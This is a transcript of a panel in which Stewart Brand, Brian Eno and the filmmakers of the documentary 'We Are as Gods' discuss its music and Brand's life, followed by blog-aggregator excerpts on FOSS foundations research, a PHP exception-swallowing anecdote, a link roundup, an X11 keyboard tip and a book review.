Stewart Brand, he is the subject of our documentary. Somewhere, long ago, I read a description of Stewart saying that he was “a finder and a founder,” which I think is a really apt way to talk about him. He finds tools, peoples, and ideas, and blends them together. He founded or co-founded Revive and Restore, The Long Now Foundation, The WELL, Global Business Network, and the Whole Earth Catalog and all of its offshoots. He is an author of multiple books, and he’s currently working on a new book called Maintenance. He’s a trained ecologist at Stanford and served as an infantry officer in the Army. I will let Stewart and Brian take it from here.

Stewart Brand: Brian, what a pleasure to be talking to you. I just love this.

Brian Eno: Yes.

Stewart Brand: You and I go back a long way. I was a fan before I was a friend, and so I continue to be a fan. I’m a fan of the music that you added to this film. I’m curious about particularly the one that is in your new album, Film Music. What’s it called…”[A] Reasonable Question.” Tell me what you remember about that piece, and I want to ask the makers of the film here what it was like from their end.

Jason Sussberg: We can play it for our audience now.

David Alvarado: You originally titled it “Why Does Music Like This Exist?”

Brian Eno: The reason it had that original title, “Why Does Music Like This Even Exist?”, was because it was one of those nights when I was in a mood of complete desperation, and thinking, “What am I doing? Is it of any use whatsoever?” I’ve learned to completely distrust my moods when I’m working on music. I could think something is fantastic, and then realize a few months later that it’s terrible, and vice versa. So what I do is I routinely mix everything that I ever work on, because I just don’t trust my judgment at the moment of working on it. That piece, the desperation I felt about it is reflected in the original title, “Why Does Music Like This Even Exist?” I was thinking, “God, this is so uninteresting. I’ve done this kind of thing a thousand times before.”

In fact, it was only when we started looking for pieces for this film…the way I look for things is just by putting my archive on random shuffle, and then doing the cleaning or washing up or tidying up books or things like that. So I just hear pieces appear. I often don’t remember them at first. I don’t remember when I did them. Anyway, this piece came up. I thought, “Oh. That’s quite a good piece.”

David Alvarado: I mean, that’s so brilliant because it’s actually… We weren’t involved, obviously, in choosing what music tracks you wanted to use for your 1976 to 2020 film album, and so you chose that one, the very one that you weren’t liking at the beginning. That’s just incredible.

Brian Eno: Yes. Well, this has happened now so many times that I think one’s judgment at the time of working has very little to do with the quality of what you’re making. It’s just to do with your mood at that moment.

Stewart Brand: So in this case, Brian, that piece is kind of joyous and exciting to hear. These guys put it in a part of the film where I’m at my best, I’m actually part of a real frontier happening. This must be a first for you, in a sense, you’re not only scoring the film, you’re in the film. This piece of film, I now realize as we listened to it, then cuts into you talking about me, but not about the music. You had no idea when they were interviewing you it was going to be overlaid on this. I sort of have to applaud these guys for not getting cute there and drowning you out with your own music there or something. “Yeah, well, he is chatting on, but let’s listen to the music.” But nevertheless, it really works in there. Do you like how it worked out in the film?

Brian Eno: Yes. Yes, I do. I like that, and quite a few of the other pieces appeared probably in places that I wouldn’t have imagined putting them, actually. This, I think, is one of the exciting things about doing film music, that you hear the music differently when you see it placed in a context. Just like music can modify a film, the film can modify the music as well. So sometimes you see the music and you think, “Oh, yes. They’ve spotted a feeling in that that I didn’t, or I hadn’t articulated anyway, I wasn’t aware of, perhaps.”

Stewart Brand: You’ve done a lot of, and the album shows it, you’ve done a lot of music for film. Are there sort of rules in your mind of how you do that? It’s different than ambient music, I guess, but there must be sort of criteria of, “Oh yeah, this is for a film, therefore X.” Are there things that you don’t do in film music?

Brian Eno: Yes. I’ll tell you what the relationship is with ambient music. Both ambient music and most of the film music I make deliberately leaves a space where somebody else might fill that space in with a lead instrument or something that is telling a story, something narrative, if you like. Even if it’s instrumental, it can still be narrative in the sense that you get the idea that this thing is the central element, which is having the adventure, and the rest is a sort of support structure to that or a landscape for that.

So what I realized, one of the things I liked about film music was that you very often just got landscape, which wasn’t populated, because the film is meant to be the thing that populates the landscape, if you like. I started listening to film music probably in the late ’60s, and it was Italian, like Nino Rota and Ennio Morricone and those kinds of people, who were writing very, very atmospheric music, which sort of lacked a central presence. I like that hole that was left, because I found the hole very inviting. It kind of says, “Come on, you be the adventurer. You, the listener, you’re in this landscape, what’s happening to you?” It’s a deliberate incompleteness, in a way, or an unfinishedness that that music has. I think that was part of the idea of ambient music as well, to try to make something that didn’t try to fix your attention, to hold it and keep it in one place, that deliberately allowed it to wander around and have a look around. So this happens to be a good formula for film music.

I really started making film music in a strange way. I used to, when I was working on my early song albums, sometimes at the end of the day I’d have half an hour left and I’d have a track up on a multi-track tape, with all the different instruments, and I’d say to the engineer, “Let’s make the film music version now.” And what that normally meant was take out the main instruments, the voice, particularly the voice, and then other things that were sort of leading the piece. Take those all out, slow the tape down, often, to half speed, and see what we can do with what’s left. Actually, I often found those parts of the day more exciting than the rest of the day, when suddenly something came into existence that nobody had ever thought about before. That was sort of how I started making film music.

So I had collected up a lot of pieces like that, and I thought, “Do you know what, I should send these to film directors. They might find a use for these.” And indeed they did. So that’s how it started, really.

Stewart Brand: So you initiated that, the filmmakers did not come to you.

Brian Eno: No. I had been approached only once before. Actually, before I ever made any albums I’d been approached by a filmmaker to do a piece of music for him, but other than that, no, I didn’t have any approaches. I sort of got the ball rolling by saying, “Look, I’m doing this kind of music, and I think it would be good for films.” So I released an album which was called Music for Films, though in fact none of the music had been in films. It was a sort of proposal: this is music that could be in films. I just left out the could be.

Stewart Brand: You are a very good marketer of your product, I must say. That’s just neat. So from graphic designers, the idea of figure-ground, and sometimes they flip and things like that, that’s all very interesting. It sounds like in a way this is music which is all ground, but invites a figure.

Brian Eno: Yes, yes.

Stewart Brand: You’re a graphic artist originally, is that right?

Brian Eno: Well, I was trained as a fine artist, actually. I was trained as a painter. Well, when I say I was trained, I went to an art school which claimed it was teaching a fine art course, so I did painting and sculpture. But actually I did as much music there as I did visual art as well.

Stewart Brand: So it’s an art school, and you were doing music. Were other people in that school doing music at that time, or is that unique to you?

Brian Eno: No, that was in the ’60s. The art schools were the crucible of a lot of what happened in pop music at that time. And funnily enough, also the art schools were where experimental composers would find an audience. The music schools were absolutely uninterested in them. Music schools were very, very academic at that time. People had just started, I was one of the pioneers of this, I suppose, had just started making music in studios. So instead of sitting down with a guitar and writing something and then going into the studio to record it, people like me were going into studios to make something using the possibilities of that place, something that you couldn’t have made otherwise. You wouldn’t come up with a guitar or a piano. A sort of whole new era of music came out of that, really. But it really came out of this possibility of multi-track recording.

Stewart Brand: So this is pre-digital? You’re basically working with the tapes and mixing tapes, or what?

Brian Eno: This was late ’60s, early ’70s. What had happened was that until about 01968, the maximum number of tracks you had was four tracks. I think people went four-track in 01968. I think the last Beatles album was done on four track, which was considered incredibly luxurious. What that meant, four tracks, was that you could do something on one track, something on another, mix them down to one track so you still got one track and then three others left, then you could kind of build things up slowly and carefully.

Over time, so, it meant something different musically, because it separated music from performance. It made music much more like painting, in that you could add something one day and take it off the next day, add something else. The act of making music extended in time like the act of painting does. You didn’t have to just walk in front of the canvas and do it all in one go, which was how music had previously been recorded. That meant that recording studios were something that painting students immediately understood, because they understood that process. But music students didn’t. They still thought it had to be about performance. In fact, there was a lot of resistance from musicians in general, because they thought that it was cheating, it wasn’t fair you were doing these things. You couldn’t actually play them. Of course, I thought, “Well, who cares? It doesn’t really matter, does it? What matters is what comes out at the end.”

Stewart Brand: Well, I was doing a little bit of music, well, sort of background stuff or putting together things for art installations at that time, and what I well remember is fucking razor blade, where you’re cutting the tape and splicing it, doing all these things. It was pretty raw. But of course, the film guys are going through the same stuff at that time. They were with their razor blade equivalents, cutting and splicing and whatnotting. So digital has just exploded the range of possibilities, which I think I’ve heard some of your theory that exploded them too far, and you’re always looking for ways to restrain your possibilities when you’re composing. Is that right?

Brian Eno: Yes. Well, I suppose it’s a problem that everybody has now, when you think about it. Now, we’re all faced with a whole universe of rabbit holes that we could spend our time disappearing down. So you have to permanently be a curator, don’t you think? You have to be always thinking, “Okay. There’s a million interesting things out there, but I’d like to get something done, so how am I going to reduce that variety and choose a path to follow?”

Stewart Brand: How much of that process is intention and how much is discovery?

Brian Eno: I think the thing that decides that is whether you’ve got a deadline or not. The most important element in my working life, a lot of the time, is a deadline. The reason it’s important… Well, I’m sure as a writer you probably appreciate deadlines as well. It makes you realize you’ve got to stop pissing around. You have to finally decide on something. So the archive of music that I have now, which is to say after those days of fiddling around like I’ve described with that piece, I’d make a rough mix, they go into the archive — I’ve got 6,790 pieces in the archive now, I noticed today. They’re nearly all unfinished. They’re sort of provocative beginnings. They’re interesting openings. When I get a job like the job of doing this film music, I think, “Okay. I need some music.” So I naturally go to the archive and see what I’ve already started which might be possible to finish as the piece for this film, for example.

So whether I finish something or not completely depends really on whether it has a destination and a deadline. If it’s got a destination, that really helps, because I think, “Okay. It’s not going to be something like that. It’s not going to be that.” It just clears a lot of those possibilities which are amplifying every day. They’re multiplying every day, these possibilities. 

Stewart Brand: One thing that surprised me about your work on this film, is I thought you would have just handed them a handful of cool things and they would then turn it into the right background at the right place from their standpoint. But it sounds like there was interaction, Jason and David, between you and Brian on some of these cuts. What do you want to say about that?

Jason Sussberg: Yeah. I mean, we had an amazing selection of great tracks to plug in and see if they could help amplify the scene visually by giving it a sonic landscape that we could work with. Then, our initial thinking was that’s how we were going to work. But then we ended up going back to you, Brian, and asking for perhaps a different track or a different tone. And then you ended up, actually, making entirely new original music, to our great delight. So one day when we woke up and we had in our inbox original music that you scored specifically for scenes, that was a great delight. We were able to have a back and forth.

Brian Eno: Yes, that’s-

Stewart Brand: Were you giving him visual scenes or just descriptions?

Jason Sussberg: Right. Actually, what we did was we pulled together descriptions of the scenes and then we had… You just wanted, Brian, just a handful of photographs to kind of grok what we were doing. I don’t think you… Maybe you could talk about why you didn’t want the actual scene, but you had a handful of stills and a description of what we were going for tonally, and then you took it from there. What we got back was both surprising and made perfect sense every time.

Brian Eno: I remember one piece in particular that I made in relation to a description and some photographs, which was called, when I made it, it was called “Brand Ostinato.” I don’t know what it became. You’d have to look up your notes to see what title it finally took. But that piece, I was very pleased with. I wanted something that was really dynamic and fresh and bracing, made you sort of stand up. So I was pleased with that one.

But I usually don’t want to see too much of the film, because one of the things I think that music can do is to not just enhance what is already there in the film, which is what most American soundtrack writing is about… Most Hollywood writing is about underlining, about saying, “Oh, this is a sad scene. We’ll make it a little sadder with some music.” Or, “This is an action scene. We’ll give it a little bit more action.” As if the audience is a bit stupid and has to be told, “This is a sad scene. You’re supposed to feel a bit weepy now.” Whereas I thought the other day, what I like better than underlining is undermining. I like this idea of making something that isn’t really quite in the film. It’s a flavor or a taste that you can point to, and people say, “Oh, yes. There’s something different going on there.”

I mean, it would be very easy with Stewart to make music that was kind of epic and, I don’t know, Western or American or Californian or something like that. There are some obvious things you could do. If you were that kind of composer, you’d carefully study Stewart and you’d find things that were Stewart-ish in music and make them. But I thought, “No. What is exciting about this is the shock of the new kind of feeling.” That piece, that particular piece, “Brand Ostinato,” has that feeling, I think, of something that is very strikingly upright and disciplined. This discipline, that’s I think the feeling of it that I like. I don’t think, in that particular part in the film, where that occurs, I don’t think that’s a scene where you would see discipline, unless somebody had suggested it to you by way of a piece of music, for example.

Stewart Brand: And Jason, did you in fact use that piece of music with that part of the film?

Jason Sussberg: Yeah, I don’t think it was exactly where Brian had intended to put it, but hearing the description, what we did was we put that song in a scene where you are going to George Church’s lab, Stewart, and we’re trying to build up George Church as this genius geneticist. So the song was actually, curiously, written about Stewart and Stewart’s character of discipline, but we apply it to another character in the film. However, what you were going for, which is this upright, adventurous, Western spirit, I think is embodied by the work of the Church Lab to de-extinct animals. So it has that same bravado and gusto that you intended, it was just we kind of… And maybe this is what you were referring to about undermining and underlining, I feel like we kind of undermined your original intention and applied it to a different character, and that dialectic was working. Of course, Stewart is in that scene, but I think that song, that track really amplifies the mood that we were going for, which is the end of the first act.

Brian Eno: Usually, when people do music that is about cutting edge science, it’s all very drifty and cosmic. It’s all kind of, “Wow, it’s so weird,” kind of thing. I really wanted to say science is about discipline, actually. It’s about doing things well and doing things right. It’s not hippie-trippy. Of course, you can feel that way about it once it’s done, but I don’t think you do it that way. So I didn’t want to go the trippy route.

David Alvarado: Yeah. We loved it. It still is the anthem of the film for us. I mean, you named it as such, but it just really feels like it embodies Stewart’s quest on all his amazing adventures he’s been on. So that’s fantastic.

Brian Eno: One of the things that is actually really touching about this film is the early life stuff, which of course I never knew anything about. As women always say, “Well, men never ask that sort of question, do they?” And in fact, in my case it’s completely true. I never bothered to ask people how they got going or that kind of autobiographical question. But what strikes me, first of all, your father was quite an important part of the story. I got the feeling that quite a lot of the character that is described in there is attributed to your father has come right through to you as well, this respect for tools and for making things, which is different from the intellectual respect for thinking about things. Often intellectuals respect other thinkers, but they don’t often respect makers in the same way. So, I wonder when you started to become aware that there could be an overlap between those two things, that there was a you that was a making you and there was a thinking you as well? I wonder if there was a point where those two sort of came together for you, in your early life.

Stewart Brand: Well, you’re pointing out something that I hadn’t really noticed as well, frankly, until the film, which is what I remember is that my father was sort of ground and my mother was figure. She was the big event. She got me completely buried in books and thinking, and she was a liberal. I never did learn what my father’s politics were, but they’re probably pretty conservative. He tried to teach me to fish and he was a really desperately awful teacher. He once taught a class of potential MIT students, he failed every one of them. My older brother Mike said, “Why did you do that?” And he said, “Well, they just did not learn the material. They didn’t make it.” And my brother actually said, “You don’t think that says anything about you as their teacher?”

So I kind of discounted —  as I’m making youthful, stupid judgments — him. I think what you pointed out is a very good one. He was trained as a civil engineer at MIT. Another older brother, Pete, went to MIT. I later completely got embedded at MIT at The Media Lab and Negroponte and all of that. In a way I feel more identified with MIT than I do with Stanford where I did graduate. In Stanford I took as many humanities as I could with a science major.

But I think it’s also something that happened with the ’60s, Brian, which is that what we were dropping out of — late beatniks, early hippies, which is my generation — was a construct that universities were imparting, and I imagine British universities have a slightly different version of this than American ones, but still, the Ivy League-type ones. I remember one of the eventual sayings of the hippies was “back to basics,” which we translated as “back to the land,” which turned out to be a mistake, but the back to basics part was pretty good. We had this idea, we were immediately followed by the baby boom. It was the bulge in the snake, the pig in the python. There were so many of us that the world was always asking us our opinion of things, which we wind up taking for granted. You could, as a young person, you could just call a press conference. “I’m a young person. I want to expound some ideas.” And they would show up and write it all seriously down. The Beatles ran into this. It was just hysterical. Pretty soon you start having opinions. 

We were getting Volkswagen Bugs and vans. This is in my mind now because I’m working on this book about maintenance. We were learning how to fix our own cars. Partly it was the either having no money or pretending to have no money, which, by the way, that was me. It turned out I actually had a fair amount, I just ignored it, that my parents had invested in my name. We were eating out of and exploring and finding amazing things basically in garbage cans and debris boxes. Learning how to cook and eat roadkill and make clothing and domes and all these things. This was something that Peter Drucker noticed about that generation, that they were the first set of creatives that took not just art but also in a sense craft and just stuff seriously, and learned… Mostly we were making mistakes with the stuff, but then you either just backed away from it or you learned how to do it decently after all and become a great guitar maker or whatever it might be. That was what the Whole Earth Catalog tapped into, was that desire to not just make your own life, but make your own world.

Brian Eno: I’m trying to think… In my own life, I can remember some games I played as kids that I made up myself. I realized that they were really the first creative things that I ever did. I invented these games. I won’t bother to explain them, they were pretty simple, but I can remember the excitement of having thought of it myself, and thinking, “I made this. I made this idea myself.” I was sort of intrigued by it. I just wondered if there was a moment in your life when you had that feeling of, “This is the pleasure of thinking, the pleasure of coming up with something that didn’t exist before”?

Stewart Brand: There was one and it’s very well expressed in the film, which was the Trips Festival in January 01966. That was the first time that I took charge over something. I’d been going along with Ken Kesey and the Pranksters. I’d been going along with various creative people, USCO, a group of artists on the East Coast, and contributing but not leading. Once I heard from one of the Pranksters, Mike Hagen, that they wanted to do a thing that would be a Trips Festival, kind of an acid test for the whole Bay Area. I knew that they could not pull that off, but that it should happen. I picked up the phone and I started making arrangements for this public event.

And it worked out great. We were lucky in all the ways that you can be lucky in, and not unlucky in any of the ways you can be unlucky. It was a coup. It was a lot of being a tour de force, not by me, but by basically the Bay Area creatives getting together in one place and changing each other and the world. That was the point for me that I had really given myself agency to drive things.

There’s other things that give you reality in the world. Also in the film is when I appeared on the Dick Cavett Show.

Brian Eno: Oh, yes.

Stewart Brand: Which was a strange event for all of us. But the effect it had in my family was that… My father was dead by then, but my mother had always been sort of treating me as the youngest child, needing help. She would send money from time to time, keep me going in North Beach. But once I was on Dick Cavett, which she regularly watched, I had grown up in her eyes. I was now an adult. I should be treated as a peer.

Brian Eno: So no more money.

Stewart Brand: Well… yeah, yeah. Did that ever happen? I think she sort of liked occasionally keeping a token of dependency going. She was very generous with the money.

The great thing of being a hippie is you didn’t need much. I was not an expensive dependent. That was, I think, another thing there that the hippies weren’t, and that makes us freer about being wealthy or not, is that we’ve had perfectly good lives without much money at all. So the money is kind of an interesting new thing that you can get fucked up by or do creatively or just ignore. But you have those choices in a way, I think, that people who are either born to money or who are getting rich young don’t have. They have other interesting situations to deal with. For us, the discipline was not enough money, and for some of them the discipline is too much money, and how do you keep that from killing you.

Brian Eno: Yes. Yeah. I’ll ask the filmmakers a question as well, if I may. It’s a very simple question, but it isn’t actually answered in the film. The question is: why Stewart? Why did you choose to make a film about him? There are so many interesting people in North America, let alone in the West Coast, but what drew you to him in particular?

Jason Sussberg: I’ll answer this, and then I’ll let you take a swipe at this, David. I mean, I’ve always looked up to Stewart from the time that I ran into an old Whole Earth Catalog. It was the Last Whole Earth Catalog, when I was 18 years old, going to college in the year 02000. So this was 25 years after it was written. I sort of dove into it head first and realized this strange artifact from the past actually was a representation of possibilities, a representation of the future. So after that moment, I read a book of Stewart’s that just came out, about the Clock of the Long Now, and after that… I’ve always been an environmentalist and Earth consciousness and trying to think about how to preserve the natural world, but also I believe in technology as a hopeful future that we can have. We can use tools to create a more sustainable world. So Stewart was able to blend these two ideas in a way that seemed uncontroversial, and it really resonated with me as a fan of science and technology and the natural world. So Stewart, pretty much from an early age, was someone I always looked up to.

When David and I went to grad school, we were talking about the problems of the environmental movement, and Stewart was at the time writing a book that would basically later articulate these ideas.

Brian Eno: Oh, yes, good.

Jason Sussberg: And so when that book came out, it was like it just put our foot on the pedals, like, “Wow, we should make a movie of Stewart and his perspective.” But yeah, I was just always a fan of his.

Brian Eno: So that was quite a long time ago, then.

Jason Sussberg: Yeah, 10 years-

Brian Eno: Is that when you started thinking about it?

Jason Sussberg: Yeah, absolutely. I had made a short film of a friend of probably yours, Brian, and of Stewart’s, Lloyd Kahn. It was a short little eight-minute documentary about Lloyd Kahn and how he thought of shelter and of home construction. That was after that moment that I thought, “This is a really rich territory to explore.” I think that actually was 02008, so at that moment I already had the inkling of, wow, this would be a fantastic biographical documentary that nobody had made.

Stewart Brand: I’m curious, what’s David’s interest?

David Alvarado: Yeah, well, I think Jason and I are drawn to complicated stories, and my god, Stewart. There was a moment in college when I almost stopped becoming a filmmaker and wanted to become a geologist. I just was so fascinated by the complexity of looking at the land, being able to read the stratigraphy, for example, of a cliff and understand deep history of how that relates to what the land looks like now. So, I of course came back into film, but I see a lot of that there in your life. I mean, the layers of what you’ve done… The top layer for us is the de-extinction, the idea of resurrecting extinct species to reset ecosystems and repair damage that humans have caused. That could be its own subject, and if it’s all you did, that would be fascinating. But sitting right underneath that sits all these amazing things all the way back to the ’60s. So I think it’s just like my path as an artist to just dig through layers and, oh boy, your life was just full of it. It was a pleasure to be able to do that with you, so thank you for sharing your life with us.

Stewart Brand: Well, thank you for packaging my life for me. As Kevin Kelly says, the movie that you put out is sort of a trailer for the whole body of stuff that you’ve got. But by going through that process with you, and for example digitizing all of my tens of thousands of photographs, and then the interviews and the shooting in various places and having the adventure in Siberia and whatnot, but… When you get to the late 70s, Brian, and if you try to think of your life as an arc or a passage or story or a whole of any kind, it’s actually quite hard, because you’ve got these various telescopic views back to certain points, but they don’t link up. You don’t understand where you’ve been very well. It’s always a mishmash. With John Markoff also doing a book version of my life, it’s actually quite freeing for me to have that done. And Brian, this is where I wish Hermione Lee would do your biography. She would do you a great favor by just, “Here is everything you’ve done, and here is what it all means. My goodness, it’s quite interesting.” And then you don’t have to do that.

Brian Eno: Yeah, I’d be so grateful if she would do that, or if anybody would do that, yes.

Stewart Brand: It’s a real gift in that it’s also a really well done work of art. It has been just delightful for me. I think one of the things, Brian, it’ll be interesting to see which you see in this when you see the film more than once, or maybe you’ve already done so, is you’ve made a great expense of your time and effort, a re-watchable film. And Brian, the music is a big part of this. The music is blended in so much in a landscapy way, that except for a couple of places where it comes to the fore, like when I’m out in the canoe on Higgins Lake and you’re singing away, that it takes a re-listen, a re-viewing of the film to really start to get what the music is doing.

And then, you guys had such a wealth of material, both of my father’s amazing filmmaking and then from the wealth of photography I did, and then the wealth of stuff you found as archivists, I mean, the number of cuts in this film must be some kind of a record for a documentary, the number of images that go blasting by. So, instead of a gallery of photographs, it’s basically a gallery of contact sheets where you’re not looking at the shot I made of so-and-so, you’ve got all 10 of them, but sort of blinked together. That rewards re-viewing, because there’s a lot of stuff where things go by and you go, “Wait, what was that? Oh, no, there’s a new thing. Oh, what was that one? That one’s gone too.” They’re adding up. It’s a nice accumulative kind of drenching of the viewer in things that really rewards…

It’s one of the reasons that I think it’s actually going to do well on people’s video screenings, because they can stop it and go, “Wait a minute. What just happened?” And go back a couple of frames. Whereas in the theater, this is going to go blasting on by. Anyway, that’s my view, that this has been enjoyable to revisit.

Brian Eno: When you first watched… Well, I don’t know at which stage you first started watching what David and Jason had been doing, but were there any kind of nasty surprises, any places where you thought, “Oh god, I wish they hadn’t found that bit of film”?

David Alvarado: That’s a great question. Yeah.

Stewart Brand: Brian, the deal I sort of made with myself and with these guys, and that I made the same one with [John] Markoff, is it’s really their product. I’m delighted to be the raw material, but I won’t make any judgments about their judgments. When I think something is wrong, a photograph that depicts somebody that turns out not to be actually that person, I would speak up and I did do that. I’ve done much more of that sort of thing with Markoff in the book. But whenever there’s interpretation, that’s not my job. I have to flip into it, and it’s easy to be, when you both care about your life and you don’t care about your life, you would have this attitude too, of Brian Eno, yawn, been there done that, got sent a fucking T-shirt. So finding a way to not be bored about one’s life is actually kind of interesting, and that’s seeing through this refraction in a funhouse mirror, in a kaleidoscope of other people’s read, that makes it actually sort of enjoyable to engage.

Brian Eno: Yes. I think one of the things that’s interesting when you watch somebody else’s take on your life, somebody writes a biography of you or recants back to you a period that you lived through, is it makes you aware of how much you constructed the story that you hold yourself. You’ve got this kind of narrative, then I did this and then of course that led to that, and then I did that… And it all sort of makes sense when you tell the story, but when somebody else tells the story, it’s just like I was saying about conspiracy theories, to think that they can come up with a completely different story, and it’s actually equally plausible, and sometimes, frighteningly, even more plausible than the one you’ve been telling yourself.

Stewart Brand: Well, it gets stronger than that, because these are people who’ve done the research. So an example from the film is these guys really went through all my father’s film. There’s stuff in there I didn’t know about. There’s an incredibly sweet photograph of my young mother, my mother being young, and basically cradling the infant, me, and canoodling with me. I’d never seen that before. So I get a blast of, “Oh, mom, how great, thank you,” that I wouldn’t have gotten if they hadn’t done this research.

And lots of times, especially for Markoff’s research…So, Doug Engelbart and The Mother of All Demos, I have a story I’ve been telling for years to myself and to the world of how I got involved in being a sort of filmmaker within that project. It turned out I had just completely forgotten that I’d actually studied Doug Engelbart before any of that, and I was going to put him in an event I was going to organize called the Education Fair, and the whole theory of his approach, very humanist approach to computers and the use of computers, computers basically blending in to human collaboration, was something I got very early. And I did the Trips Festival and he sort of thought I was a showman and then they brought me on as the adviser to the actual production. But the genesis of the event, I’d been telling this wrong story for years. There’s quite a lot of that. As you say, I think our own view of ourselves becomes fiction very quickly.

Brian Eno: Yes. Yes. It’s partly because one wants to see a kind of linear progression and a causality. One doesn’t really want to admit that there was a lot of randomness in it, that if you’d taken that turning on the street that day, life would have panned out completely differently. That’s so disorientating, that thought, that we don’t tolerate it for long. We sort of patch it up to make the story hold together.

Stewart Brand: That’s what you’ll get from the Tom Stoppard biography. Remember that his first serious, well, popular play was Rosencrantz and Guildenstern Are Dead, and it starts with a flip of a coin. It turns out his own past of how he got from Singapore to India and things like that were just these kind of random war-related events that carved a path of chance, chance, chance, chance, that then informed his creative life for the rest of his life. There’s a book coming out from Daniel Kahneman called Noise, that Bachman and Kahneman and another guy have generated. It looks like it’s going to be fantastic. Basically, he’s going beyond Thinking Fast and Slow to…a whole lot of the data that science and our world and the mind deals with is this kind of randomized, stochastic noise, which we then interpret as signal. And it’s not. It’s hard to hold it in your mind, that randomness. It’s one of the things I appreciate from having studied evolution at an impressionable age, is that a lot of evolution is: randomness is not a bad thing that happens. Randomness is the most creative thing that happens.

Brian Eno: Yes. Well, we are born pattern recognizers. If we don’t find them, we’ll construct them. We take all the patterns that we recognize very seriously. We think that they are reality. But they aren’t necessarily exclusive. They’re not exclusive realities.

Jason Sussberg: All right. I hate to end it here. This discussion is really fascinating. We’re getting into some very heady philosophical ideas. But unfortunately, our time is short. So we have to bid both Stewart and Brian farewell. I encourage everybody to go watch the film We Are as Gods, if you haven’t already. Thank you so much for participating in this discussion.

David Alvarado: A special thanks to Stripe Press for helping making this film a reality. Thank you to you, the viewer, for watching, to Stewart for sharing your life, and Brian for this amazing original score.

Brian Eno: Good. Well, good luck with it. I hope it does very well.

Planet DebianMartin Michlmayr: Research on FOSS foundations

I worked on research on FOSS foundations and published two reports:

Growing Open Source Projects with a Stable Foundation

This primer covers non-technical aspects that the majority of projects will have to consider at some point. It also explains how FOSS foundations can help projects grow and succeed.

This primer explains:

  • What issues and areas to consider
  • How other projects and foundations have approached these topics
  • What FOSS foundations bring to the table
  • How to choose a FOSS foundation

You can download Growing Open Source Projects with a Stable Foundation.

Research report

The research report describes the findings of the research and aims to help understand the operations and challenges FOSS foundations face.

This report covers topics such as:

  • Role and activities of foundations
  • Challenges faced and gaps in the service offerings
  • Operational aspects, including reasons for starting an org and choice of jurisdiction
  • Trends, such as the "foundation in a foundation" model
  • Recommendations for different stakeholders

You can download the research report.


This research was sponsored by Ford Foundation and Alfred P. Sloan Foundation. The research was part of their Critical Digital Infrastructure Research initiative, which investigates the role of open source in digital infrastructure.

Worse Than FailureCodeSOD: An Exceptional Warning

Pierre inherited a PHP application. The code is pretty standard stuff, for a long-living PHP application which has been touched by many developers with constantly shifting requirements. Which is to say, it's a bit of a mess.

But there's one interesting quirk that shows up in the codebase. At some point, someone working on the project added a kinda stock way they chose to handle exceptions. Future developers saw that, didn't understand it, and copied it to just follow what appeared to be the "standard".

And that's why so many catch blocks look like this:

catch(ZendException $e) { $e = $e // no warning }

Pierre and a few peers spent more time than they should have puzzling over the comment, before they realized that an empty catch block would give you a warning about an "unused variable" in their linter. By setting the variable equal to itself, it got "used".

This is in lieu of, y'know, disabling that warning, or even better- addressing the issue by making sure you don't just blindly swallow exceptions and hope it's not a problem.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

Planet DebianRussell Coker: Links April 2021

Dr Justin Lehmiller’s blog post comparing his official (academic style) and real biographies is interesting [1]. Also the rest of his blog is interesting too, he works at the Kinsey Institute so you know he’s good.

Media Matters has an interesting article on the spread of vaccine misinformation on Instagram [2].

John Goerzen wrote a long post summarising some of the many ways of having a decentralised Internet [3]. One problem he didn’t address is how to choose between them, I could spend months of work to setup a fraction of those services.

Erasmo Acosta wrote an interesting medium article “Could Something as Pedestrian as the Mitochondria Unlock the Mystery of the Great Silence?” [4]. I don’t know enough about biology to determine how plausible this is. But it is a worry, I hope that humans will meet extra-terrestrial intelligences at some future time.

Meredith Haggerty wrote an insightful Medium article about the love vs money aspects of romantic comedies [5]. Changes in viewer demographics would be one factor that makes lead actors in romantic movies significantly less wealthy in recent times.

Informative article about ZIP compression and the history of compression in general [6].

Vice has an insightful article about one way of taking over SMS access of phones without affecting voice call or data access [7]. With this method the victom won’t notice that they are having their sservice interfered with until it’s way too late. They also explain the chain of problems in the US telecommunications industry that led to this. I wonder what’s happening in this regard in other parts of the world.

The clown code of ethics (8 Commandments) is interesting [8].

Sam Hartman wrote an insightful blog post about the problems with RMS and how to deal with him [9]. Also Sam Whitton has an interesting take on this [10]. Another insightful post is by Selam G about RMS long history of bad behavior and the way universities are run [11].

Cory Doctorow wrote an insightful article for Locus about free markets with a focus on DRM on audio books [12]. We need legislative changes to fix this!

Planet DebianJunichi Uekawa: Swapping caps and control in X11.

Swapping caps and control in X11. The configuration is at /etc/default/keyboard, and both virtual console and X11 use that configuration in Debian. For systemd users, systemd-localed.service can be used to configure using localectl(1) command, and Debian systemd has been patched to update /etc/default/keyboard (managed by keyboard-configuration package). Not sure where I find a documentation for this. systemd for Debian is patched with debian/patches/debian/Use-Debian-specific-config-files.patch to change /etc/X11/xorg.conf.d/00-keyboard.conf to /etc/default/keyboard.

Planet DebianRuss Allbery: Review: Beyond Shame

Review: Beyond Shame, by Kit Rocha

Series: Beyond #1
Publisher: Kit Rocha
Copyright: December 2013
Format: Kindle
Pages: 270

I read this book as part of the Beyond Series Bundle (Books 1-3), which is what the sidebar information is for.

Noelle is a child of Eden, the rich and technologically powerful city of a post-apocalyptic world. As the daughter of a councilman, she had everything she wanted except the opportunity to feel. Eden's religious elite embrace a doctrine of strict Puritanism: Even hugging one's children was frowned upon, let alone anything related to sex. Noelle was too rebellious to settle for that, which is why this book opens with her banished from Eden, ejected into Sector Four. The sectors are the city slums, full of gangs and degenerates and violence, only a slight step up from the horrific farming communes. Luckily for her, she literally stumbles into one of the lieutenants of the O'Kane gang, who are just as violent as their reputations but who have surprising sympathy for a helpless city girl.

My shorthand distinction between romance and erotica is that romance mixes some sex into the plot and erotica mixes some plot into the sex. Beyond Shame is erotica, specifically BDSM erotica. The forbidden sensations that Noelle got kicked out of Eden for pursuing run strongly towards humiliation, which is tangled up in the shame she was taught to feel about anything sexual. There is a bit of a plot surrounding the O'Kanes who take her in, their leader, some political skulduggery that eventually involves people she knows, and some inter-sector gang warfare, but it's quite forgettable (and indeed I've already forgotten most of it). The point of the story is Noelle navigating a relationship with Jasper (among others) that involves a lot of very graphic sex.

